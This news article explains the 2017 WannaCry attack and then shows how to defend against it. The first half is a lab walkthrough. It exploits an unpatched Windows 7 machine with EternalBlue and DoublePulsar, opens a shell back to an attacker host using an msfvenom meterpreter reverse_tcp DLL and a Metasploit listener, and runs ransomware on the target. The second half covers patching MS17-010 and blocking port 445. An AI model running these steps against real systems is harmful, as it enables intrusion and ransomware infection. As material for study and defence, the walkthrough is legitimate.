新闻快讯
< >

比特币病毒让你WannaCry?其实防御很简单

17年5月13日,不法分子利用NSA黑客武器库泄露的“永恒之蓝”发起比特币病毒攻击事件。“永恒之蓝”会扫描开放445文件共享端口的Windows机器,植入勒索软件。由于以前国内多次爆发利用445端口传播的蠕虫,运营商已对个人用户封掉445端口,但教育网还没有此限制,所以教育网是受攻击的重灾区!我们针对此病毒,解密其制造过程。

注:此报告仅为科学研究,乱造病毒可不是闹着玩。根据中华人民共和国刑法第二百八十六条 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

永恒之蓝工具分析报告

环境

攻击机1Win7 32位 专业版SP1192.168.61.133

攻击机2 kali2192.168.61.128

靶机win7 64位 旗舰版SP1192.168.61.129

实验准备

攻击机1安装

python-2.6.6.msi

https://www.python.org/download/releases/2.6.6/

pywin32-221.win32-py2.6.exe

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

下载方程式工具包并解压

开启靶机,靶机可以不关防火墙,甚至可以安装杀毒软件,但不能打上对应补丁

实验步骤

攻击机1进入工具目录,运行fb.py

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

输入靶机IP 192.168.61.129

输入攻击者IP 192.168.61.133

No 不启动重定向

No 不需要开启日志

4 创建新工程

Uenit_test 输入工程名

比特币病毒让你WannaCry?其实防御很简单-E安全

Use Eternalblue

比特币病毒让你WannaCry?其实防御很简单-E安全

然后是一路回车,因为全是默认配置

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

确认一下启动

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

由于启用了fuzzbunch扩展,失败了会自动多次尝试,有时候是一次就成功。

然后是另一个攻击模块的配合使用Doublepulsar

比特币病毒让你WannaCry?其实防御很简单-E安全

同样的全回车

直到选系统选择64位的

比特币病毒让你WannaCry?其实防御很简单-E安全

选择攻击方式选运行dll

比特币病毒让你WannaCry?其实防御很简单-E安全

接下去要选择dll路径,然而我们还没有,就先放一边

开启攻击机2 kali,用来生成dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.61.128 LPORT=9999 -f dll > /root/桌面/uenit_attack.dll

比特币病毒让你WannaCry?其实防御很简单-E安全

桌面目录下多了一个uenit_attack.dll,将其拷贝到攻击机1目录下

然后开启监听

msfconsole

msf > use exploit/multi/handler

msf > set LHOST 192.168.61.128

msf > set LPORT 9999

msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf > exploit

比特币病毒让你WannaCry?其实防御很简单-E安全

再回到攻击机1,已经将之前kali上的uenit_attack.dll拷贝到c:根目录下

然后输入dllpayload地址为 C:\uenit_attack.dll

再一路回车

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

确认后开始

比特币病毒让你WannaCry?其实防御很简单-E安全

成功以后返回kali查看,已近反弹回shell了。

比特币病毒让你WannaCry?其实防御很简单-E安全

Ipconfig

比特币病毒让你WannaCry?其实防御很简单-E安全

Dir

比特币病毒让你WannaCry?其实防御很简单-E安全

可以看到当前目录在c:windowssystem32

我们在当前创建一个目录并进入

比特币病毒让你WannaCry?其实防御很简单-E安全

然后上传我们的exe,比如勒索软件

比特币病毒让你WannaCry?其实防御很简单-E安全

在靶机上的对于目录里,我们发现了上传上去的可执行程序

比特币病毒让你WannaCry?其实防御很简单-E安全

如下是当前靶机的界面

比特币病毒让你WannaCry?其实防御很简单-E安全

在攻击机中运行刚才上传的勒索软件

比特币病毒让你WannaCry?其实防御很简单-E安全

跳出了勒索软件界面

比特币病毒让你WannaCry?其实防御很简单-E安全

并且发现勒索软件加密了所有文档和图片,以及修改了壁纸。

防御方法

360nsa工具防御

比特币病毒让你WannaCry?其实防御很简单-E安全

然后就被要求安装360安全卫士,接着就是打补丁,打上补丁一切就安全了

比特币病毒让你WannaCry?其实防御很简单-E安全

也可以自行打上微软补丁

https://technet.microsoft.com/zh-cn/library/security/MS17-010下载自己对应版本的补丁即可,查看自己系统版本,可在“我的电脑”或“计算机”上右键—属性即可

比特币病毒让你WannaCry?其实防御很简单-E安全

也有小伙伴希望自食其力,自己关闭端口

在开始菜单中选择“运行”或者win+r同时按呼出“运行”

比特币病毒让你WannaCry?其实防御很简单-E安全

输入gpedit.Msc呼出本地策略组编辑器

双击计算机配置

比特币病毒让你WannaCry?其实防御很简单-E安全

Windows设置

比特币病毒让你WannaCry?其实防御很简单-E安全

安全设置

比特币病毒让你WannaCry?其实防御很简单-E安全

IP安全策略

比特币病毒让你WannaCry?其实防御很简单-E安全

右键空白处,选择创建IP策略

比特币病毒让你WannaCry?其实防御很简单-E安全

根据指示点击下一步

比特币病毒让你WannaCry?其实防御很简单-E安全

为策略命名后点击下一步

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

比特币病毒让你WannaCry?其实防御很简单-E安全

点击添加规则

比特币病毒让你WannaCry?其实防御很简单-E安全

为规则命名后点击添加

比特币病毒让你WannaCry?其实防御很简单-E安全

目标地址下拉选择“我的IP地址”,点击协议

比特币病毒让你WannaCry?其实防御很简单-E安全

协议下拉选择TCP,选择到此端口选择,填写445。

比特币病毒让你WannaCry?其实防御很简单-E安全

点击确定返回IP筛选器列表

比特币病毒让你WannaCry?其实防御很简单-E安全

点击确定返回新规则属性,点选关闭445这一规则

比特币病毒让你WannaCry?其实防御很简单-E安全

切换到筛选器操作栏目

比特币病毒让你WannaCry?其实防御很简单-E安全

点击添加操作

比特币病毒让你WannaCry?其实防御很简单-E安全

点选阻止

比特币病毒让你WannaCry?其实防御很简单-E安全

在常规选项卡可以给这一操作命名,然后点确定

比特币病毒让你WannaCry?其实防御很简单-E安全

点选阻止,确定选中关闭445后,点确定

比特币病毒让你WannaCry?其实防御很简单-E安全

在这一策略上右键点击选择“分配”

比特币病毒让你WannaCry?其实防御很简单-E安全

我们验证下这一方法是否可行,再次用Eterblue工具攻击,得到

比特币病毒让你WannaCry?其实防御很简单-E安全

证实关闭445端口起作用了,一条关闭从外界到445端口数据的链路就被完全阻断了,为了防止nsa更多工具的攻击,需要关闭的端口还有135、137、138、139。

结语

目前,网络安全问题日益突出,勒索病毒也并不是首次出现,但是只要我们提高网络安全意识,及时打上系统补丁,注意杀毒软件的推送补丁,就能防范于未然。